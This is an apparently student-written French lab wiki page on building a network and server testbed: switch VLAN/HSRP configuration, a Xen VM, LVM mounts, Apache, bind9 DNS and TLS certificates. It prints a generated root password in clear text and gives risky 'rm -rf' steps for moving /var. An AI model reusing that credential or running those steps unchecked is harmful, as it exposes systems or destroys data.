   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51428</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51428"/>
				<updated>2019-11-29T13:07:36Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Cryptage de la Clef = */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
